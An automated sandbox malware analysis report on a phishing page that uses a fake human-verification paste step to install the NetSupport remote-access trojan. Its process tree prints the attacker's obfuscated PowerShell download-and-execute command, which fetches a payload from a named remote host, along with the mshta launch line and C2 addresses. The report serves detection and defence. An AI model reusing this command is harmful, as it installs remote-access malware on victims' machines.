Edit tour
Windows
Analysis Report
https://inspyrehomedesign.com/Ray-verify.html
Overview
General Information
Detection
NetSupport RAT
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Contains functionalty to change the wallpaper
Delayed program exit found
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTML page contains hidden javascript code
HTML page contains string obfuscation
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Classification
- System is w10x64_ra
- chrome.exe (PID: 3008 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 6832 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2164 --fi eld-trial- handle=189 6,i,274078 1035066481 159,162738 8381035868 9985,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6436 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://inspy rehomedesi gn.com/Ray -verify.ht ml" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- mshta.exe (PID: 7848 cmdline:
"C:\Window s\system32 \mshta.exe " https:// inspyrehom edesign.co m/Ray-veri fy.html # ? ''Veri fy you are human - R ay Verific ation ID: 3293'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 7944 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='(New- Object Net .We'; $c4= 'bClient). Downlo'; $ c3='adStri ng(''http: //traverse cityspring break.com/ o/o.png'') ';$TC=I`E` X ($c1,$c4 ,$c3 -Join '')|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 8128 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - cmd.exe (PID: 8152 cmdline:
"C:\Window s\system32 \cmd.exe" /c attrib +h C:\User s\user\App Data\Roami ng\bpsFyf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - attrib.exe (PID: 8176 cmdline:
attrib +h C:\Users\u ser\AppDat a\Roaming\ bpsFyf MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - client32.exe (PID: 7368 cmdline:
"C:\Users\ user\AppDa ta\Roaming \bpsFyf\cl ient32.exe " MD5: EE75B57B9300AAB96530503BFAE8A2F2)
- rundll32.exe (PID: 7448 cmdline:
C:\Windows \System32\ rundll32.e xe C:\Wind ows\System 32\shell32 .dll,SHCre ateLocalSe rverRunDll {9aa46009 -3ce0-458a -a354-7156 10a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 2 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 7 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Remote Access Functionality |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-28T19:46:17.038167+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:17.218232+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:18.039720+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:19.280274+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:19.443100+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:19.676594+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:19.838942+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:20.094216+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:20.317348+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:25.238092+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:25.701188+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
2024-10-28T19:46:26.502458+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49726 | 166.1.160.211 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-28T19:45:13.415753+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49729 | 92.255.85.135 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
Source: | Code function: | 21_2_110AD570 |
Phishing |
---|
Source: | LLM: | ||
Source: | LLM: |
Source: | HTTP Parser: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | File opened: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 21_2_1102D330 | |
Source: | Code function: | 21_2_11065890 | |
Source: | Code function: | 21_2_1106A0A0 | |
Source: | Code function: | 21_2_111266E0 |
Networking |
---|
Source: | Suricata IDS: |
Source: | Image file has PE prefix: |